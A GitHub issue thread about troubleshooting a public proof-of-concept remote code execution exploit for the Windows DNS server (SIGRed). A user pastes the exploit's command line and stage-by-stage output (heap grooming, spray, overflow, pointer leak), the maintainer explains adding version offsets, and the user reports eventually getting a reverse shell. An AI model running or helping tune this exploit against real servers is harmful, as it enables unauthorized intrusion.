Open Kedar59 opened 4 months ago
Kedar59
commented
4 months ago So I ran the exploit a few more times and each time it gives a different error and it seems random for some reason. But eventually it worked in one of my attempts and I got the reverse shell.
chompie1337
commented
4 months ago Please see supported versions section of the readme:
https://github.com/chompie1337/SIGRed_RCE_PoC?tab=readme-ov-file#supported-versions
You will have to add the offsets for the version you are targeting to offsets.py. At the time of this exploit I did not have access to every single vulnerable version of dns.exe and msvcrt.dll
On Wed, Jun 12, 2024 at 1:27 PM Kedar @.***> wrote:
I am trying the exploit with conditional forwarding. Output after running exploit.py : $ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee [!] grooming small buffer size freelist Waiting for small cached records to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163 [!] doing DNS record heap spray [!] waiting for target subdomain record to be freed
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering realloc and overflow [!] triggering free for fake timeout object [!] triggering timeout object allocations [!] triggering frees for heap ptr leak [!] triggering heap ptr leak [+] controllable heap addr: 0x28acd3567d0 [!] waiting for timeout object allocation
0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123 [!] triggering dns!RR_Free addr leak [-] Could not find dns offsets! DNS leak 64 file : dnsleak64.png (view on web) https://github.com/chompie1337/SIGRed_RCE_PoC/assets/104148492/fc9b5b8d-6c50-4fe4-ad00-319b6b0747f7 Windows version screen shot : windows.server.version.png (view on web) https://github.com/chompie1337/SIGRed_RCE_PoC/assets/104148492/9826488a-4210-4f07-9fee-548950f4c546
— Reply to this email directly, view it on GitHub https://github.com/chompie1337/SIGRed_RCE_PoC/issues/16, or unsubscribe https://github.com/notifications/unsubscribe-auth/ANOA267H5YOQCY6AHDXPWV3ZHCAIJAVCNFSM6AAAAABJGZUXQKVHI2DSMVQWIX3LMV43ASLTON2WKOZSGM2DSMZSGY3DMNY . You are receiving this because you are subscribed to this thread.Message ID: @.***>
I am trying the exploit with conditional forwarding. Output after running exploit.py :
Windows version screen shot :
$ sudo python3 exploit.py -ip 192.168.146.136 -d kedar.ee[!] grooming small buffer size freelistWaiting for small cached records to be freed0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120....125....130....135....140....145....150....155....160..163[!] doing DNS record heap spray[!] waiting for target subdomain record to be freed0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123[!] triggering realloc and overflow[!] triggering free for fake timeout object[!] triggering timeout object allocations[!] triggering frees for heap ptr leak[!] triggering heap ptr leak[+] controllable heap addr: 0x28acd3567d0[!] waiting for timeout object allocation0....5....10....15....20....25....30....35....40....45....50....55....60....65....70....75....80....85....90....95....100....105....110....115....120..123[!] triggering dns!RR_Free addr leak[-] Could not find dns offsets!DNS leak 64 file :